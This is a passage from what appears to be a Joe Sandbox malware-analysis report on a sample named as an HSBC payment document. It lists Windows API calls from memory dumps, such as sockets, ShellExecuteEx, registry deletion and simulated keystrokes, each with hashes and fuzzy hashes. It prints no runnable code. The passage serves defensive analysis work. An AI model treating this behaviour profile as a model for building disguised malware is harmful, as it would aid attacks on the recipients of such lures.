                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007A61FE
                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 007A620A
                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007A6246
                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007A6257
                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007A902A,?,?,000000FF,00000000,?,000000FF,?), ref: 007A6291
                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007A62B1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3864802216-0
                                                                                                                                • Opcode ID: 918610b3deaa1600c4527eacbfcfcfaed66ca2dc37dce203f1fa212414b3edbe
                                                                                                                                • Instruction ID: 062e094b14f6f520f88efdf8a2ec48a614d36021d531f8a6d0d7d4c6f0dd8f25
                                                                                                                                • Opcode Fuzzy Hash: 918610b3deaa1600c4527eacbfcfcfaed66ca2dc37dce203f1fa212414b3edbe
                                                                                                                                • Instruction Fuzzy Hash: F9314F72101214BFEB118F50CC8AFEB3BA9FF8A765F084165FE089A191D6799C41CB64
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memcmp
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2931989736-0
                                                                                                                                • Opcode ID: c6eb913fe1bf391183cfb762108917c73995103fe395adaca6c253597fc4df0e
                                                                                                                                • Instruction ID: a894aee07aba7a0f4acf5801766383490425761adf641e2ef3b6c444cbef9eb9
                                                                                                                                • Opcode Fuzzy Hash: c6eb913fe1bf391183cfb762108917c73995103fe395adaca6c253597fc4df0e
                                                                                                                                • Instruction Fuzzy Hash: 7D21A1E1702205BBAA057625DD52FFB775D9E103C8F88C020FD0896A57FB6CDE2682B1
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
                                                                                                                                  • Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC
                                                                                                                                  • Part of subcall function 0073FC86: _wcscpy.LIBCMT ref: 0073FCA9
                                                                                                                                • _wcstok.LIBCMT ref: 0078EC94
                                                                                                                                • _wcscpy.LIBCMT ref: 0078ED23
                                                                                                                                • _memset.LIBCMT ref: 0078ED56
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                • String ID: X
                                                                                                                                • API String ID: 774024439-3081909835
                                                                                                                                • Opcode ID: 0bee63c50001f68160ad4df2a255bca2f11ec548f57153ccfc7168449600291c
                                                                                                                                • Instruction ID: 44f2fde0a902581a8d9bebf5ef4e7978211287c1b7bd0fd68607b1a1477d6c3f
                                                                                                                                • Opcode Fuzzy Hash: 0bee63c50001f68160ad4df2a255bca2f11ec548f57153ccfc7168449600291c
                                                                                                                                • Instruction Fuzzy Hash: 88C19C71608710DFC754EF24D889A6AB7E4FF85310F04492DF9999B2A2DB38EC45CB92
                                                                                                                                APIs
                                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00796C00
                                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00796C21
                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00796C34
                                                                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00796CEA
                                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00796CA7
                                                                                                                                  • Part of subcall function 0077A7E9: _strlen.LIBCMT ref: 0077A7F3
                                                                                                                                  • Part of subcall function 0077A7E9: _memmove.LIBCMT ref: 0077A815
                                                                                                                                • _strlen.LIBCMT ref: 00796D44
                                                                                                                                • _memmove.LIBCMT ref: 00796DAD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3619996494-0
                                                                                                                                • Opcode ID: 742aa569f086c4be90f04a8c17245e9d3957630aad6edad8cfdd12038512c1ff
                                                                                                                                • Instruction ID: c946a9f3231f59cdc69475be8a47520cecd553ea83f53f5a1543cd79797b7169
                                                                                                                                • Opcode Fuzzy Hash: 742aa569f086c4be90f04a8c17245e9d3957630aad6edad8cfdd12038512c1ff
                                                                                                                                • Instruction Fuzzy Hash: A381E471204310EBDB10EF24EC89E6AB7E8AF84714F548A1CF5559B292DB78ED04CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e545a8a09eb64da0db2bcc4ce7307df38d775e7cde37c2fca618592e889a68f6
                                                                                                                                • Instruction ID: 00457b2ff26d8837ef51fc63d8cf0ca601f58c270b2e59defbd75d40547775b7
                                                                                                                                • Opcode Fuzzy Hash: e545a8a09eb64da0db2bcc4ce7307df38d775e7cde37c2fca618592e889a68f6
                                                                                                                                • Instruction Fuzzy Hash: 0E717C30900119EFCB04DF98DC89ABFBB79FF99310F648159F915AA251C738AA51CFA4
                                                                                                                                APIs
                                                                                                                                • IsWindow.USER32(011950C0), ref: 007AB3EB
                                                                                                                                • IsWindowEnabled.USER32(011950C0), ref: 007AB3F7
                                                                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007AB4DB
                                                                                                                                • SendMessageW.USER32(011950C0,000000B0,?,?), ref: 007AB512
                                                                                                                                • IsDlgButtonChecked.USER32(?,?), ref: 007AB54F
                                                                                                                                • GetWindowLongW.USER32(011950C0,000000EC), ref: 007AB571
                                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007AB589
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4072528602-0
                                                                                                                                • Opcode ID: ef34f7f1fb1bdadca2df5111aa82b65e5138ff89db5ad3dcd639d8af45dfc62a
                                                                                                                                • Instruction ID: 04c1bf985d1c7825a3c6d0e849fd7b820a198f20cd63127e901f007f75090de9
                                                                                                                                • Opcode Fuzzy Hash: ef34f7f1fb1bdadca2df5111aa82b65e5138ff89db5ad3dcd639d8af45dfc62a
                                                                                                                                • Instruction Fuzzy Hash: 4871AF34605284EFDF209F95C894FBA7BB9EF8F300F148269E945972A3C739A950DB50
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 0079F448
                                                                                                                                • _memset.LIBCMT ref: 0079F511
                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 0079F556
                                                                                                                                  • Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
                                                                                                                                  • Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC
                                                                                                                                  • Part of subcall function 0073FC86: _wcscpy.LIBCMT ref: 0073FCA9
                                                                                                                                • GetProcessId.KERNEL32(00000000), ref: 0079F5CD
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0079F5FC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 3522835683-2766056989
                                                                                                                                • Opcode ID: 93fef1453c18f136150a8304a484d258b3656931ebeb8605aaf1253a8eb0bac0
                                                                                                                                • Instruction ID: 380d4983941eb426828f3d20bef5508e9f48d4a53de05535905e0bdcb04d35d5
                                                                                                                                • Opcode Fuzzy Hash: 93fef1453c18f136150a8304a484d258b3656931ebeb8605aaf1253a8eb0bac0
                                                                                                                                • Instruction Fuzzy Hash: 6B61BE75A00629DFCF04EFA4D8859AEBBF5FF49310F188069E855AB351CB38AD41CB94
                                                                                                                                APIs
                                                                                                                                • GetParent.USER32(?), ref: 00780F8C
                                                                                                                                • GetKeyboardState.USER32(?), ref: 00780FA1
                                                                                                                                • SetKeyboardState.USER32(?), ref: 00781002
                                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00781030
                                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0078104F
                                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00781095
                                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007810B8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 87235514-0
                                                                                                                                • Opcode ID: a8112544c6cd3abde0da2a47159f3eff734df547313a2f4241849a7704874a1c
                                                                                                                                • Instruction ID: eeef7302a53de7886ab94521c515d2c041a66b13b5a79f9a66472d6152a0a462
                                                                                                                                • Opcode Fuzzy Hash: a8112544c6cd3abde0da2a47159f3eff734df547313a2f4241849a7704874a1c
                                                                                                                                • Instruction Fuzzy Hash: 165103A0A847D53DFB3662348C09BB6BFAD6B06300F088589E2D8858C3C29DDCDAD751
                                                                                                                                APIs
                                                                                                                                • GetParent.USER32(00000000), ref: 00780DA5
                                                                                                                                • GetKeyboardState.USER32(?), ref: 00780DBA
                                                                                                                                • SetKeyboardState.USER32(?), ref: 00780E1B
                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00780E47
                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00780E64
                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00780EA8
                                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00780EC9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 87235514-0
                                                                                                                                • Opcode ID: 5032f6883cb0bc7e27887208b3cf7c86c2fe46eae5e8e6706bbf3a4b0408f30d
                                                                                                                                • Instruction ID: 4b7612a8f219f7129f1ca43cdce59b03cb51dad3b3772887b67acb8426916b1c
                                                                                                                                • Opcode Fuzzy Hash: 5032f6883cb0bc7e27887208b3cf7c86c2fe46eae5e8e6706bbf3a4b0408f30d
                                                                                                                                • Instruction Fuzzy Hash: CC51E7A06847D57DFB7267748C45B7B7EA96B06300F088889F1D4864C2D399AC9DD7A0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcsncpy$LocalTime
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2945705084-0
                                                                                                                                • Opcode ID: ff39da0914d5a385255870f484a0e85af6bfe27e9702924d631c21dcf9d7475b
                                                                                                                                • Instruction ID: a2b63b65cd62b0df49ad9af5194dba5922f6a00cf61594e7d69676bff6cc14c8
                                                                                                                                • Opcode Fuzzy Hash: ff39da0914d5a385255870f484a0e85af6bfe27e9702924d631c21dcf9d7475b
                                                                                                                                • Instruction Fuzzy Hash: 85418565C50654B6CB11FBF48C4AACFB3B89F05310F508956F518E3222FB38A765C7AA
                                                                                                                                APIs
                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0077D5D4
                                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0077D60A
                                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0077D61B
                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0077D69D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                • String ID: ,,{$DllGetClassObject
                                                                                                                                • API String ID: 753597075-623769245
                                                                                                                                • Opcode ID: 85cee345e9b0d373eaa557cc296730b5c8ffb6e12359dfcd1419b68e3d167f4d
                                                                                                                                • Instruction ID: 48791c50f7a6760c9a5521c44842a5afd8e18f2cba530be1f2135bcbcfb84e30
                                                                                                                                • Opcode Fuzzy Hash: 85cee345e9b0d373eaa557cc296730b5c8ffb6e12359dfcd1419b68e3d167f4d
                                                                                                                                • Instruction Fuzzy Hash: 22413CB1600204EFDF25DF54C884A9A7BB9EF84390B15C1A9E90DDF205D7B9DD44DBA0
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0078466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00783697,?), ref: 0078468B
                                                                                                                                  • Part of subcall function 0078466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00783697,?), ref: 007846A4
                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 007836B7
                                                                                                                                • _wcscmp.LIBCMT ref: 007836D3
                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 007836EB
                                                                                                                                • _wcscat.LIBCMT ref: 00783733
                                                                                                                                • SHFileOperationW.SHELL32(?), ref: 0078379F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                • String ID: \*.*
                                                                                                                                • API String ID: 1377345388-1173974218
                                                                                                                                • Opcode ID: ee1ff5301572affdee1aaf3661edef3c6fad69642d5fc144ca6a78e427a40c12
                                                                                                                                • Instruction ID: 68e098d7f7c7e032b5e3a84ac5d4c711cf1977b2924136eea591cbbcf6c567c8
                                                                                                                                • Opcode Fuzzy Hash: ee1ff5301572affdee1aaf3661edef3c6fad69642d5fc144ca6a78e427a40c12
                                                                                                                                • Instruction Fuzzy Hash: 1641AFB1648344AAC755EF68C4459DFB7E8EF89740F40082EF49AC3251EB38D689C752
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 007A72AA
                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A7351
                                                                                                                                • IsMenu.USER32(?), ref: 007A7369
                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007A73B1
                                                                                                                                • DrawMenuBar.USER32 ref: 007A73C4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 3866635326-4108050209
                                                                                                                                • Opcode ID: 9d9d1939be7b7286ba468adfbe123e0cc273f2aaf3cfb80840577acd022d3255
                                                                                                                                • Instruction ID: f1c28ebd31330faddcea7dcd1070d817863f2205e82c245d6ecee2b7824eccb1
                                                                                                                                • Opcode Fuzzy Hash: 9d9d1939be7b7286ba468adfbe123e0cc273f2aaf3cfb80840577acd022d3255
                                                                                                                                • Instruction Fuzzy Hash: FB413575A01288EFDF24DF50D884AAABBB8FF4A314F158629FD05AB250D738AD14DF50
                                                                                                                                APIs
                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007A0FD4
                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007A0FFE
                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 007A10B5
                                                                                                                                  • Part of subcall function 007A0FA5: RegCloseKey.ADVAPI32(?), ref: 007A101B
                                                                                                                                  • Part of subcall function 007A0FA5: FreeLibrary.KERNEL32(?), ref: 007A106D
                                                                                                                                  • Part of subcall function 007A0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007A1090
                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 007A1058
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 395352322-0
                                                                                                                                • Opcode ID: 43cbdc4640a044048785753a9eedd1ee949f42c1fa18184a182fbdad4f153b78
                                                                                                                                • Instruction ID: bcc08d8de1b3de0e2a94301fdf96baa4fbe0642ef3eb8f6d5fce94323c350701
                                                                                                                                • Opcode Fuzzy Hash: 43cbdc4640a044048785753a9eedd1ee949f42c1fa18184a182fbdad4f153b78
                                                                                                                                • Instruction Fuzzy Hash: A3311C71900109FFEB15DB90DC89AFFB7BCEF4A300F404269E501A2141EA789E859AA4
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007A62EC
                                                                                                                                • GetWindowLongW.USER32(011950C0,000000F0), ref: 007A631F
                                                                                                                                • GetWindowLongW.USER32(011950C0,000000F0), ref: 007A6354
                                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007A6386
                                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007A63B0
                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007A63C1
                                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007A63DB
                                                                                                                                Memory Dump Source
